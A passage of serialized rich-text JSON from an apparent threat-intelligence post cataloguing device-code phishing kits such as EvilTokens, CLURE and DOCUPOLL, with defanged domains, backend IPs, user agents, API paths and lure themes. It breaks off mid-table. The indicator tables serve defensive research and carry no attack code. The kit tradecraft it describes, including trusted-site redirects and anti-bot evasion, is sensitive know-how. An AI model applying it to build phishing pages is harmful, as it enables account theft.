",[],{},{"nodeType":1258,"data":4211,"content":4212},{},[4213],{"nodeType":1257,"value":4214,"marks":4215,"data":4216},"Early implementations were quite different, for example using ScrapingBee to generate the displayed code, and varied hosting on vercel, fastly, edgeone, and others. ",[],{},{"nodeType":1258,"data":4218,"content":4219},{},[4220],{"nodeType":1257,"value":4221,"marks":4222,"data":4223},"After initially appearing on custom domains, the production version is now predominantly hosted on Cloudflare Workers, as per the broader tracking of the campaign. The descriptive HTML comments around ANTIBOT functions have also been removed in later versions. ",[],{},{"nodeType":1258,"data":4225,"content":4226},{},[4227,4231,4238],{"nodeType":1257,"value":4228,"marks":4229,"data":4230},"The production version of EvilTokens showcases common ",[],{},{"nodeType":1364,"data":4232,"content":4233},{"uri":2681},[4234],{"nodeType":1257,"value":2684,"marks":4235,"data":4237},[4236],{"type":1372},{},{"nodeType":1257,"value":4239,"marks":4240,"data":4241}," we've come to associate with PhaaS kits in the AiTM space — using multiple redirects through trusted sites before serving the malicious page, using bot protection to block security tools from analysing the page, and so on. It also uses a pop-up window for the device code entry rather than a redirect, reducing the friction for the victim (it looks pretty convincing, too).",[],{},{"nodeType":1335,"data":4243,"content":4247},{"target":4244},{"sys":4245},{"id":4246,"type":1340,"linkType":1341},"73rNOIEDPfP5IJwpFaxVc2",[],{"nodeType":1335,"data":4249,"content":4253},{"target":4250},{"sys":4251},{"id":4252,"type":1340,"linkType":1341},"5BJSvOQUW9UpsQtoDNtgTC",[],{"nodeType":1335,"data":4255,"content":4259},{"target":4256},{"sys":4257},{"id":4258,"type":1340,"linkType":1341},"3dbePPxVb4h4SauGg3glIL",[],{"nodeType":1335,"data":4261,"content":4265},{"target":4262},{"sys":4263},{"id":4264,"type":1340,"linkType":1341},"1UOLcmNQvOsL5tdLSVuviq",[],{"nodeType":1335,"data":4267,"content":4271},{"target":4268},{"sys":4269},{"id":4270,"type":1340,"linkType":1341},"55XRqLSwUUi2D4ZVpJboml",[],{"nodeType":1335,"data":4273,"content":4277},{"target":4274},{"sys":4275},{"id":4276,"type":1340,"linkType":1341},"5wg5yr2Lo8t3f72ZV815c",[],{"nodeType":1335,"data":4279,"content":4283},{"target":4280},{"sys":4281},{"id":4282,"type":1340,"linkType":1341},"35cowlL6i3rkGXOGmSxlI1",[],{"nodeType":1258,"data":4285,"content":4286},{},[4287],{"nodeType":1257,"value":31,"marks":4288,"data":4289},[],{},{"nodeType":4291,"data":4292,"content":4293},"table",{},[4294,4320,4404,4456,4480],{"nodeType":4295,"data":4296,"content":4297},"table-row",{},[4298,4310],{"nodeType":4299,"data":4300,"content":4301},"table-cell",{},[4302],{"nodeType":1258,"data":4303,"content":4304},{},[4305],{"nodeType":1257,"value":4306,"marks":4307,"data":4309},"Frontend infrastructure",[4308],{"type":1318},{},{"nodeType":4299,"data":4311,"content":4312},{},[4313],{"nodeType":1258,"data":4314,"content":4315},{},[4316],{"nodeType":1257,"value":4317,"marks":4318,"data":4319},"Workers.dev, vercel.app, github.io, fastly.net, edgeone.dev",[],{},{"nodeType":4295,"data":4321,"content":4322},{},[4323,4334],{"nodeType":4299,"data":4324,"content":4325},{},[4326],{"nodeType":1258,"data":4327,"content":4328},{},[4329],{"nodeType":1257,"value":4330,"marks":4331,"data":4333},"Backend infrastructure",[4332],{"type":1318},{},{"nodeType":4299,"data":4335,"content":4336},{},[4337,4367],{"nodeType":1258,"data":4338,"content":4339},{},[4340,4345,4349,4354,4358,4363],{"nodeType":1257,"value":4341,"marks":4342,"data":4344},"Example IP: (V3) ",[4343],{"type":1318},{},{"nodeType":1257,"value":4346,"marks":4347,"data":4348},"162.220.232.71 (Railway AS400940) ",[],{},{"nodeType":1257,"value":4350,"marks":4351,"data":4353},"(V2)",[4352],{"type":1318},{},{"nodeType":1257,"value":4355,"marks":4356,"data":4357}," 71.11.42.193 ",[],{},{"nodeType":1257,"value":4359,"marks":4360,"data":4362},"(V1) ",[4361],{"type":1318},{},{"nodeType":1257,"value":4364,"marks":4365,"data":4366},"72.218.25.107",[],{},{"nodeType":1258,"data":4368,"content":4369},{},[4370,4375,4379,4384,4388,4392,4396,4400],{"nodeType":1257,"value":4371,"marks":4372,"data":4374},"Backend User Agent:",[4373],{"type":1318},{},{"nodeType":1257,"value":4376,"marks":4377,"data":4378}," ",[],{},{"nodeType":1257,"value":4380,"marks":4381,"data":4383},"(V3) ",[4382],{"type":1318},{},{"nodeType":1257,"value":4385,"marks":4386,"data":4387},"node, ",[],{},{"nodeType":1257,"value":4350,"marks":4389,"data":4391},[4390],{"type":1318},{},{"nodeType":1257,"value":4393,"marks":4394,"data":4395},", Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683 Safari/537.36 OPR/57.0.3098.91 ",[],{},{"nodeType":1257,"value":4359,"marks":4397,"data":4399},[4398],{"type":1318},{},{"nodeType":1257,"value":4401,"marks":4402,"data":4403},"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 OPR/56.0.3051.52 ",[],{},{"nodeType":4295,"data":4405,"content":4406},{},[4407,4418],{"nodeType":4299,"data":4408,"content":4409},{},[4410],{"nodeType":1258,"data":4411,"content":4412},{},[4413],{"nodeType":1257,"value":4414,"marks":4415,"data":4417},"Network paths",[4416],{"type":1318},{},{"nodeType":4299,"data":4419,"content":4420},{},[4421,4428,4435,4442,4449],{"nodeType":1258,"data":4422,"content":4423},{},[4424],{"nodeType":1257,"value":4425,"marks":4426,"data":4427},"/api/rate-limit ",[],{},{"nodeType":1258,"data":4429,"content":4430},{},[4431],{"nodeType":1257,"value":4432,"marks":4433,"data":4434},"/api/fingerprint ",[],{},{"nodeType":1258,"data":4436,"content":4437},{},[4438],{"nodeType":1257,"value":4439,"marks":4440,"data":4441},"/api/captcha-verify ",[],{},{"nodeType":1258,"data":4443,"content":4444},{},[4445],{"nodeType":1257,"value":4446,"marks":4447,"data":4448},"/api/init /api/generate-code ",[],{},{"nodeType":1258,"data":4450,"content":4451},{},[4452],{"nodeType":1257,"value":4453,"marks":4454,"data":4455},"/api/check-auth",[],{},{"nodeType":4295,"data":4457,"content":4458},{},[4459,4470],{"nodeType":4299,"data":4460,"content":4461},{},[4462],{"nodeType":1258,"data":4463,"content":4464},{},[4465],{"nodeType":1257,"value":4466,"marks":4467,"data":4469},"Lure themes",[4468],{"type":1318},{},{"nodeType":4299,"data":4471,"content":4472},{},[4473],{"nodeType":1258,"data":4474,"content":4475},{},[4476],{"nodeType":1257,"value":4477,"marks":4478,"data":4479},"Various MS lures (e.g. Outlook, SharePoint, Teams) DocuSign, Adobe",[],{},{"nodeType":4295,"data":4481,"content":4482},{},[4483,4494],{"nodeType":4299,"data":4484,"content":4485},{},[4486],{"nodeType":1258,"data":4487,"content":4488},{},[4489],{"nodeType":1257,"value":4490,"marks":4491,"data":4493},"Example Domain",[4492],{"type":1318},{},{"nodeType":4299,"data":4495,"content":4496},{},[4497,4509,4521,4533,4545],{"nodeType":1258,"data":4498,"content":4499},{},[4500,4505],{"nodeType":1257,"value":4501,"marks":4502,"data":4504},"Precursor A:",[4503],{"type":1318},{},{"nodeType":1257,"value":4506,"marks":4507,"data":4508}," teams-zpfvwnpxuc[.]edgeone.dev",[],{},{"nodeType":1258,"data":4510,"content":4511},{},[4512,4517],{"nodeType":1257,"value":4513,"marks":4514,"data":4516},"Precursor B: ",[4515],{"type":1318},{},{"nodeType":1257,"value":4518,"marks":4519,"data":4520},"authenticate-m365-accountsecurity-m-pi[.]vercel.app",[],{},{"nodeType":1258,"data":4522,"content":4523},{},[4524,4529],{"nodeType":1257,"value":4525,"marks":4526,"data":4528},"Courts Access: ",[4527],{"type":1318},{},{"nodeType":1257,"value":4530,"marks":4531,"data":4532},"secure-systems-validations-courts[.]vercel.app",[],{},{"nodeType":1258,"data":4534,"content":4535},{},[4536,4541],{"nodeType":1257,"value":4537,"marks":4538,"data":4540},"Early ANTIBOT:",[4539],{"type":1318},{},{"nodeType":1257,"value":4542,"marks":4543,"data":4544}," interface-auth-en-useast[.]global.ssl.fastly.net",[],{},{"nodeType":1258,"data":4546,"content":4547},{},[4548,4553],{"nodeType":1257,"value":4549,"marks":4550,"data":4552},"Production ANTIBOT: ",[4551],{"type":1318},{},{"nodeType":1257,"value":4554,"marks":4555,"data":4556},"index-z059-document-pending-reviewsign-xlss7994824[.]awalizer[.]workers.dev",[],{},{"nodeType":1307,"data":4558,"content":4559},{},[],{"nodeType":1468,"data":4561,"content":4562},{},[4563],{"nodeType":1257,"value":4564,"marks":4565,"data":4567},"“SHAREFILE”",[4566],{"type":1318},{},{"nodeType":4291,"data":4569,"content":4570},{},[4571,4594,4633,4656,4679],{"nodeType":4295,"data":4572,"content":4573},{},[4574,4584],{"nodeType":4299,"data":4575,"content":4576},{},[4577],{"nodeType":1258,"data":4578,"content":4579},{},[4580],{"nodeType":1257,"value":4306,"marks":4581,"data":4583},[4582],{"type":1318},{},{"nodeType":4299,"data":4585,"content":4586},{},[4587],{"nodeType":1258,"data":4588,"content":4589},{},[4590],{"nodeType":1257,"value":4591,"marks":4592,"data":4593},"No hosting markers visible.",[],{},{"nodeType":4295,"data":4595,"content":4596},{},[4597,4607],{"nodeType":4299,"data":4598,"content":4599},{},[4600],{"nodeType":1258,"data":4601,"content":4602},{},[4603],{"nodeType":1257,"value":4330,"marks":4604,"data":4606},[4605],{"type":1318},{},{"nodeType":4299,"data":4608,"content":4609},{},[4610,4622],{"nodeType":1258,"data":4611,"content":4612},{},[4613,4618],{"nodeType":1257,"value":4614,"marks":4615,"data":4617},"Example IP:",[4616],{"type":1318},{},{"nodeType":1257,"value":4619,"marks":4620,"data":4621}," 147.45.60.47 (Global Connectivity Solutions LLP AS215540)",[],{},{"nodeType":1258,"data":4623,"content":4624},{},[4625,4629],{"nodeType":1257,"value":4371,"marks":4626,"data":4628},[4627],{"type":1318},{},{"nodeType":1257,"value":4630,"marks":4631,"data":4632}," node",[],{},{"nodeType":4295,"data":4634,"content":4635},{},[4636,4646],{"nodeType":4299,"data":4637,"content":4638},{},[4639],{"nodeType":1258,"data":4640,"content":4641},{},[4642],{"nodeType":1257,"value":4414,"marks":4643,"data":4645},[4644],{"type":1318},{},{"nodeType":4299,"data":4647,"content":4648},{},[4649],{"nodeType":1258,"data":4650,"content":4651},{},[4652],{"nodeType":1257,"value":4653,"marks":4654,"data":4655},"POST /api/device/start  POST /api/device/poll",[],{},{"nodeType":4295,"data":4657,"content":4658},{},[4659,4669],{"nodeType":4299,"data":4660,"content":4661},{},[4662],{"nodeType":1258,"data":4663,"content":4664},{},[4665],{"nodeType":1257,"value":4466,"marks":4666,"data":4668},[4667],{"type":1318},{},{"nodeType":4299,"data":4670,"content":4671},{},[4672],{"nodeType":1258,"data":4673,"content":4674},{},[4675],{"nodeType":1257,"value":4676,"marks":4677,"data":4678},"Citrix ShareFile document transfer — file card with sender info, expiry warning, download/preview buttons",[],{},{"nodeType":4295,"data":4680,"content":4681},{},[4682,4693],{"nodeType":4299,"data":4683,"content":4684},{},[4685],{"nodeType":1258,"data":4686,"content":4687},{},[4688],{"nodeType":1257,"value":4689,"marks":4690,"data":4692},"Example domain",[4691],{"type":1318},{},{"nodeType":4299,"data":4694,"content":4695},{},[4696],{"nodeType":1258,"data":4697,"content":4698},{},[4699],{"nodeType":1257,"value":4700,"marks":4701,"data":4702},"cghdfg[.]vbchkioi[.]su",[],{},{"nodeType":1335,"data":4704,"content":4708},{"target":4705},{"sys":4706},{"id":4707,"type":1340,"linkType":1341},"1TtZ6VsMSTlPvy7W996w9E",[],{"nodeType":1307,"data":4710,"content":4711},{},[],{"nodeType":1468,"data":4713,"content":4714},{},[4715],{"nodeType":1257,"value":4716,"marks":4717,"data":4719},"“CLURE”",[4718],{"type":1318},{},{"nodeType":4291,"data":4721,"content":4722},{},[4723,4746,4785,4808,4831],{"nodeType":4295,"data":4724,"content":4725},{},[4726,4736],{"nodeType":4299,"data":4727,"content":4728},{},[4729],{"nodeType":1258,"data":4730,"content":4731},{},[4732],{"nodeType":1257,"value":4306,"marks":4733,"data":4735},[4734],{"type":1318},{},{"nodeType":4299,"data":4737,"content":4738},{},[4739],{"nodeType":1258,"data":4740,"content":4741},{},[4742],{"nodeType":1257,"value":4743,"marks":4744,"data":4745},"API on api.duemineral.uk:8443 and api.loadingdocuments.uk:8443 (rotates). ",[],{},{"nodeType":4295,"data":4747,"content":4748},{},[4749,4759],{"nodeType":4299,"data":4750,"content":4751},{},[4752],{"nodeType":1258,"data":4753,"content":4754},{},[4755],{"nodeType":1257,"value":4330,"marks":4756,"data":4758},[4757],{"type":1318},{},{"nodeType":4299,"data":4760,"content":4761},{},[4762,4774],{"nodeType":1258,"data":4763,"content":4764},{},[4765,4770],{"nodeType":1257,"value":4766,"marks":4767,"data":4769},"Example IP: ",[4768],{"type":1318},{},{"nodeType":1257,"value":4771,"marks":4772,"data":4773},"162.243.166.119 (DigitalOcean AS14061)",[],{},{"nodeType":1258,"data":4775,"content":4776},{},[4777,4781],{"nodeType":1257,"value":4371,"marks":4778,"data":4780},[4779],{"type":1318},{},{"nodeType":1257,"value":4782,"marks":4783,"data":4784}," python-requests/2.32.5",[],{},{"nodeType":4295,"data":4786,"content":4787},{},[4788,4798],{"nodeType":4299,"data":4789,"content":4790},{},[4791],{"nodeType":1258,"data":4792,"content":4793},{},[4794],{"nodeType":1257,"value":4414,"marks":4795,"data":4797},[4796],{"type":1318},{},{"nodeType":4299,"data":4799,"content":4800},{},[4801],{"nodeType":1258,"data":4802,"content":4803},{},[4804],{"nodeType":1257,"value":4805,"marks":4806,"data":4807},"GET /api/status/{numeric_SID} (port :8443)",[],{},{"nodeType":4295,"data":4809,"content":4810},{},[4811,4821],{"nodeType":4299,"data":4812,"content":4813},{},[4814],{"nodeType":1258,"data":4815,"content":4816},{},[4817],{"nodeType":1257,"value":4466,"marks":4818,"data":4820},[4819],{"type":1318},{},{"nodeType":4299,"data":4822,"content":4823},{},[4824],{"nodeType":1258,"data":4825,"content":4826},{},[4827],{"nodeType":1257,"value":4828,"marks":4829,"data":4830},"SharePoint \"Team Site\" doc library, SharePoint \"Shared Document\" individual share",[],{},{"nodeType":4295,"data":4832,"content":4833},{},[4834,4844],{"nodeType":4299,"data":4835,"content":4836},{},[4837],{"nodeType":1258,"data":4838,"content":4839},{},[4840],{"nodeType":1257,"value":4689,"marks":4841,"data":4843},[4842],{"type":1318},{},{"nodeType":4299,"data":4845,"content":4846},{},[4847],{"nodeType":1258,"data":4848,"content":4849},{},[4850],{"nodeType":1257,"value":4851,"marks":4852,"data":4853},"auth[.]duemineral[.]uk",[],{},{"nodeType":1335,"data":4855,"content":4859},{"target":4856},{"sys":4857},{"id":4858,"type":1340,"linkType":1341},"3DAm11OYudNrqbL6pda5S1",[],{"nodeType":1307,"data":4861,"content":4862},{},[],{"nodeType":1468,"data":4864,"content":4865},{},[4866],{"nodeType":1257,"value":4867,"marks":4868,"data":4870},"“LINKID”",[4869],{"type":1318},{},{"nodeType":4291,"data":4872,"content":4873},{},[4874,4897,4942,4972,4995],{"nodeType":4295,"data":4875,"content":4876},{},[4877,4887],{"nodeType":4299,"data":4878,"content":4879},{},[4880],{"nodeType":1258,"data":4881,"content":4882},{},[4883],{"nodeType":1257,"value":4306,"marks":4884,"data":4886},[4885],{"type":1318},{},{"nodeType":4299,"data":4888,"content":4889},{},[4890],{"nodeType":1258,"data":4891,"content":4892},{},[4893],{"nodeType":1257,"value":4894,"marks":4895,"data":4896},"Adobe variant has Cloudflare challenge-platform iframe (CF-protected origin). Relative API paths — self-hosted.",[],{},{"nodeType":4295,"data":4898,"content":4899},{},[4900,4910],{"nodeType":4299,"data":4901,"content":4902},{},[4903],{"nodeType":1258,"data":4904,"content":4905},{},[4906],{"nodeType":1257,"value":4330,"marks":4907,"data":4909},[4908],{"type":1318},{},{"nodeType":4299,"data":4911,"content":4912},{},[4913,4924,4931],{"nodeType":1258,"data":4914,"content":4915},{},[4916,4920],{"nodeType":1257,"value":4766,"marks":4917,"data":4919},[4918],{"type":1318},{},{"nodeType":1257,"value":4921,"marks":4922,"data":4923},"185.176.220.22 (2cloud.eu AS39845)",[],{},{"nodeType":1258,"data":4925,"content":4926},{},[4927],{"nodeType":1257,"value":4928,"marks":4929,"data":4930},"2600:1f10:470d:9a00:1437:ec30:be61:3494 (AWS AS16509)",[],{},{"nodeType":1258,"data":4932,"content":4933},{},[4934,4938],{"nodeType":1257,"value":4371,"marks":4935,"data":4937},[4936],{"type":1318},{},{"nodeType":1257,"value":4939,"marks":4940,"data":4941}," axios/1.10.0 , axios/1.13.6",[],{},{"nodeType":4295,"data":4943,"content":4944},{},[4945,4955],{"nodeType":4299,"data":4946,"content":4947},{},[4948],{"nodeType":1258,"data":4949,"content":4950},{},[4951],{"nodeType":1257,"value":4414,"marks":4952,"data":4954},[4953],{"type":1318},{},{"nodeType":4299,"data":4956,"content":4957},{},[4958,4965],{"nodeType":1258,"data":4959,"content":4960},{},[4961],{"nodeType":1257,"value":4962,"marks":4963,"data":4964},"POST /api/device/start",[],{},{"nodeType":1258,"data":4966,"content":4967},{},[4968],{"nodeType":1257,"value":4969,"marks":4970,"data":4971},"GET /api/device/status/{sessionId}",[],{},{"nodeType":4295,"data":4973,"content":4974},{},[4975,4985],{"nodeType":4299,"data":4976,"content":4977},{},[4978],{"nodeType":1258,"data":4979,"content":4980},{},[4981],{"nodeType":1257,"value":4466,"marks":4982,"data":4984},[4983],{"type":1318},{},{"nodeType":4299,"data":4986,"content":4987},{},[4988],{"nodeType":1258,"data":4989,"content":4990},{},[4991],{"nodeType":1257,"value":4992,"marks":4993,"data":4994},"MS Teams meeting invitation (with interactive date/time picker), Adobe Acrobat Sign document review",[],{},{"nodeType":4295,"data":4996,"content":4997},{},[4998,5008],{"nodeType":4299,"data":4999,"content":5000},{},[5001],{"nodeType":1258,"data":5002,"content":5003},{},[5004],{"nodeType":1257,"value":4689,"marks":5005,"data":5007},[5006],{"type":1318},{},{"nodeType":4299,"data":5009,"content":5010},{},[5011],{"nodeType":1258,"data":5012,"content":5013},{},[5014],{"nodeType":1257,"value":5015,"marks":5016,"data":5017},"sdtr-site[.]cfd",[],{},{"nodeType":1335,"data":5019,"content":5023},{"target":5020},{"sys":5021},{"id":5022,"type":1340,"linkType":1341},"22hsIzlkptC2JTIUtbOuUn",[],{"nodeType":1307,"data":5025,"content":5026},{},[],{"nodeType":1468,"data":5028,"content":5029},{},[5030],{"nodeType":1257,"value":5031,"marks":5032,"data":5034},"“AUTHOV”",[5033],{"type":1318},{},{"nodeType":4291,"data":5036,"content":5037},{},[5038,5061,5107,5130,5153],{"nodeType":4295,"data":5039,"content":5040},{},[5041,5051],{"nodeType":4299,"data":5042,"content":5043},{},[5044],{"nodeType":1258,"data":5045,"content":5046},{},[5047],{"nodeType":1257,"value":4306,"marks":5048,"data":5050},[5049],{"type":1318},{},{"nodeType":4299,"data":5052,"content":5053},{},[5054],{"nodeType":1258,"data":5055,"content":5056},{},[5057],{"nodeType":1257,"value":5058,"marks":5059,"data":5060},"workers.dev",[],{},{"nodeType":4295,"data":5062,"content":5063},{},[5064,5074],{"nodeType":4299,"data":5065,"content":5066},{},[5067],{"nodeType":1258,"data":5068,"content":5069},{},[5070],{"nodeType":1257,"value":4330,"marks":5071,"data":5073},[5072],{"type":1318},{},{"nodeType":4299,"data":5075,"content":5076},{},[5077,5088],{"nodeType":1258,"data":5078,"content":5079},{},[5080,5084],{"nodeType":1257,"value":4766,"marks":5081,"data":5083},[5082],{"type":1318},{},{"nodeType":1257,"value":5085,"marks":5086,"data":5087},"192.3.225.100 (HostPapa / ColoCrossing AS36352)",[],{},{"nodeType":1258,"data":5089,"content":5090},{},[5091,5095,5098,5103],{"nodeType":1257,"value":4371,"marks":5092,"data":5094},[5093],{"type":1318},{},{"nodeType":1257,"value":4376,"marks":5096,"data":5097},[],{},{"nodeType":1257,"value":5099,"marks":5100,"data":5102}," ",[5101],{"type":1318},{},{"nodeType":1257,"value":5104,"marks":5105,"data":5106},"python-httpx/0.28.1",[],{},{"nodeType":4295,"data":5108,"content":5109},{},[5110,5120],{"nodeType":4299,"data":5111,"content":5112},{},[5113],{"nodeType":1258,"data":5114,"content":5115},{},[5116],{"nodeType":1257,"value":4414,"marks":5117,"data":5119},[5118],{"type":1318},{},{"nodeType":4299,"data":5121,"content":5122},{},[5123],{"nodeType":1258,"data":5124,"content":5125},{},[5126],{"nodeType":1257,"value":5127,"marks":5128,"data":5129},"GET /landing/api/session-status?session_id=&token=",[],{},{"nodeType":4295,"data":5131,"content":5132},{},[5133,5143],{"nodeType":4299,"data":5134,"content":5135},{},[5136],{"nodeType":1258,"data":5137,"content":5138},{},[5139],{"nodeType":1257,"value":4466,"marks":5140,"data":5142},[5141],{"type":1318},{},{"nodeType":4299,"data":5144,"content":5145},{},[5146],{"nodeType":1258,"data":5147,"content":5148},{},[5149],{"nodeType":1257,"value":5150,"marks":5151,"data":5152},"Adobe Acrobat document sharing (PDF preview, sender avatar)",[],{},{"nodeType":4295,"data":5154,"content":5155},{},[5156,5166],{"nodeType":4299,"data":5157,"content":5158},{},[5159],{"nodeType":1258,"data":5160,"content":5161},{},[5162],{"nodeType":1257,"value":4689,"marks":5163,"data":5165},[5164],{"type":1318},{},{"nodeType":4299,"data":5167,"content":5168},{},[5169],{"nodeType":1258,"data":5170,"content":5171},{},[5172],{"nodeType":1257,"value":5173,"marks":5174,"data":5175},"milosh-solibella-0dcio[.]sgttommy.workers.dev",[],{},{"nodeType":1335,"data":5177,"content":5181},{"target":5178},{"sys":5179},{"id":5180,"type":1340,"linkType":1341},"6szO6IKJ32usyxIKX1efZy",[],{"nodeType":1307,"data":5183,"content":5184},{},[],{"nodeType":1468,"data":5186,"content":5187},{},[5188],{"nodeType":1257,"value":5189,"marks":5190,"data":5192},"“DOCUPOLL”",[5191],{"type":1318},{},{"nodeType":4291,"data":5194,"content":5195},{},[5196,5219,5257,5294,5317],{"nodeType":4295,"data":5197,"content":5198},{},[5199,5209],{"nodeType":4299,"data":5200,"content":5201},{},[5202],{"nodeType":1258,"data":5203,"content":5204},{},[5205],{"nodeType":1257,"value":4306,"marks":5206,"data":5208},[5207],{"type":1318},{},{"nodeType":4299,"data":5210,"content":5211},{},[5212],{"nodeType":1258,"data":5213,"content":5214},{},[5215],{"nodeType":1257,"value":5216,"marks":5217,"data":5218},"Github.io and workers.dev hosting",[],{},{"nodeType":4295,"data":5220,"content":5221},{},[5222,5232],{"nodeType":4299,"data":5223,"content":5224},{},[5225],{"nodeType":1258,"data":5226,"content":5227},{},[5228],{"nodeType":1257,"value":4330,"marks":5229,"data":5231},[5230],{"type":1318},{},{"nodeType":4299,"data":5233,"content":5234},{},[5235,5246],{"nodeType":1258,"data":5236,"content":5237},{},[5238,5242],{"nodeType":1257,"value":4766,"marks":5239,"data":5241},[5240],{"type":1318},{},{"nodeType":1257,"value":5243,"marks":5244,"data":5245},"144.172.103.240 (FranTech Solutions / RouterHosting / Cloudzy AS14956)",[],{},{"nodeType":1258,"data":5247,"content":5248},{},[5249,5253],{"nodeType":1257,"value":4371,"marks":5250,"data":5252},[5251],{"type":1318},{},{"nodeType":1257,"value":5254,"marks":5255,"data":5256}," Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19042",[],{},{"nodeType":4295,"data":5258,"content":5259},{},[5260,5270],{"nodeType":4299,"data":5261,"content":5262},{},[5263],{"nodeType":1258,"data":5264,"content":5265},{},[5266],{"nodeType":1257,"value":4414,"marks":5267,"data":5269},[5268],{"type":1318},{},{"nodeType":4299,"data":5271,"content":5272},{},[5273,5280,5287],{"nodeType":1258,"data":5274,"content":5275},{},[5276],{"nodeType":1257,"value":5277,"marks":5278,"data":5279},"POST /api/v1/landing-pages/public/{slug}/init",[],{},{"nodeType":1258,"data":5281,"content":5282},{},[5283],{"nodeType":1257,"value":5284,"marks":5285,"data":5286},"POST .../poll",[],{},{"nodeType":1258,"data":5288,"content":5289},{},[5290],{"nodeType":1257,"value":5291,"marks":5292,"data":5293},"POST .../track",[],{},{"nodeType":4295,"data":5295,"content":5296},{},[5297,5307],{"nodeType":4299,"data":5298,"content":5299},{},[5300],{"nodeType":1258,"data":5301,"content":5302},{},[5303],{"nodeType":1257,"value":4466,"marks":5304,"data":5306},[5305],{"type":1318},{},{"nodeType":4299,"data":5308,"content":5309},{},[5310],{"nodeType":1258,"data":5311,"content":5312},{},[5313],{"nodeType":1257,"value":5314,"marks":5315,"data":5316},"DocuSign document signing. One sample is a full scrape of real docusign.com (free-account page) with kit injected.",[],{},{"nodeType":4295,"data":5318,"content":5319},{},[5320,5330],{"nodeType":4299,"data":5321,"content":5322},{},[5323],{"nodeType":1258,"data":5324,"content":5325},{},[5326],{"nodeType":1257,"value":4689,"marks":5327,"data":5329},[5328],{"type":1318},{},{"nodeType":4299,"data":5331,"content":5332},{},[5333],{"nodeType":1258,"data":5334,"content":5335},{},[5336],{"nodeType":1257,"value":5337,"marks":5338,"data":5339},"docufirmar[.]github.io",[],{},{"nodeType":1335,"data":5341,"content":5345},{"target":5342},{"sys":5343},{"id":5344,"type":1340,"linkType":1341},"6Y1XABHnQD82R3MW80HnQZ",[],{"nodeType":1307,"data":5347,"content":5348},{},[],{"nodeType":1468,"data":5350,"content":5351},{},[5352],{"nodeType":1257,"value":5353,"marks":5354,"data":5356},"“FLOW_TOKEN”",[5355],{"type":1318},{},{"nodeType":4291,"data":5358,"content":5359},{},[5360,5382,5427,5457,5480],{"nodeType":4295,"data":5361,"content":5362},{},[5363,5373],{"nodeType":4299,"data":5364,"content":5365},{},[5366],{"nodeType":1258,"data":5367,"content":5368},{},[5369],{"nodeType":1257,"value":4306,"marks":5370,"data":5372},[5371],{"type":1318},{},{"nodeType":4299,"data":5374,"content":5375},{},[5376],{"nodeType":1258,"data":5377,"content":5378},{},[5379],{"nodeType":1257,"value":5058,"marks":5380,"data":5381},[],{},{"nodeType":4295,"data":5383,"content":5384},{},[5385,5395],{"nodeType":4299,"data":5386,"content":5387},{},[5388],{"nodeType":1258,"data":5389,"content":5390},{},[5391],{"nodeType":1257,"value":4330,"marks":5392,"data":5394},[5393],{"type":1318},{},{"nodeType":4299,"data":5396,"content":5397},{},[5398,5409],{"nodeType":1258,"data":5399,"content":5400},{},[5401,5405],{"nodeType":1257,"value":4766,"marks":5402,"data":5404},[5403],{"type":1318},{},{"nodeType":1257,"value":5406,"marks":5407,"data":5408},"43.166.163.163 (Tencent Cloud AS132203)",[],{},{"nodeType":1258,"data":5410,"content":5411},{},[5412,5416,5419,5423],{"nodeType":1257,"value":4371,"marks":5413,"data":5415},[5414],{"type":1318},{},{"nodeType":1257,"value":4376,"marks":5417,"data":5418},[],{},{"nodeType":1257,"value":5099,"marks":5420,"data":5422},[5421],{"type":1318},{},{"nodeType":1257,"value":5424,"marks":5425,"data":5426},"(null)",[],{},{"nodeType":4295,"data":5428,"content":5429},{},[5430,5440],{"nodeType":4299,"data":5431,"content":5432},{},[5433],{"nodeType":1258,"data":5434,"content":5435},{},[5436],{"nodeType":1257,"value":4414,"marks":5437,"data":5439},[5438],{"type":1318},{},{"nodeType":4299,"data":5441,"content":5442},{},[5443,5450],{"nodeType":1258,"data":5444,"content":5445},{},[5446],{"nodeType":1257,"value":5447,"marks":5448,"data":5449},"POST /api/handler.php ",[],{},{"nodeType":1258,"data":5451,"content":5452},{},[5453],{"nodeType":1257,"value":5454,"marks":5455,"data":5456},"(actions: device_code_generate, device_code_poll_public)",[],{},{"nodeType":4295,"data":5458,"content":5459},{},[5460,5470],{"nodeType":4299,"data":5461,"content":5462},{},[5463],{"nodeType":1258,"data":5464,"content":5465},{},[5466],{"nodeType":1257,"value":4466,"marks":5467,"data":5469},[5468],{"type":1318},{},{"nodeType":4299,"data":5471,"content":5472},{},[5473],{"nodeType":1258,"data":5474,"content":5475},{},[5476],{"nodeType":1257,"value":5477,"marks":5478,"data":5479},"DocuSign \"Salary Adjustment Document — 2026\", Microsoft banner · HR Department sender",[],{},{"nodeType":4295,"data":5481,"content":5482},{},[5483,5493],{"nodeType":4299,"data":5484,"content":5485},{},[5486],{"nodeType":1258,"data":5487,"content":5488},{},[5489],{"nodeType":1257,"value":4689,"marks":5490,"data":5492},[5491],{"type":1318},{},{"nodeType":4299,"data":5494,"content":5495},{},[5496],{"nodeType":1258,"data":5497,"content":5498},{},[5499],{"nodeType":1257,"value":5500,"marks":5501,"data":5502},"salaryadjustment-2afb52.pmb6fefc52b3f9aa5c2dbf[.]workers.dev",[],{},{"nodeType":1335,"data":5504,"content":5508},{"target":5505},{"sys":5506},{"id":5507,"type":1340,"linkType":1341},"6xiTDHStbiJh7LMhjAZcPd",[],{"nodeType":1307,"data":5510,"content":5511},{},[],{"nodeType":1468,"data":5513,"content":5514},{},[5515],{"nodeType":1257,"value":5516,"marks":5517,"data":5519},"“PAPRIKA”",[5518],{"type":1318},{},{"nodeType":4291,"data":5521,"content":5522},{},[5523,5546,5569,5592],{"nodeType":4295,"data":5524,"content":5525},{},[5526,5536],{"nodeType":4299,"data":5527,"content":5528},{},[5529],{"nodeType":1258,"data":5530,"content":5531},{},[5532],{"nodeType":1257,"value":4306,"marks":5533,"data":5535},[5534],{"type":1318},{},{"nodeType":4299,"data":5537,"content":5538},{},[5539],{"nodeType":1258,"data":5540,"content":5541},{},[5542],{"nodeType":1257,"value":5543,"marks":5544,"data":5545},"AWS S3 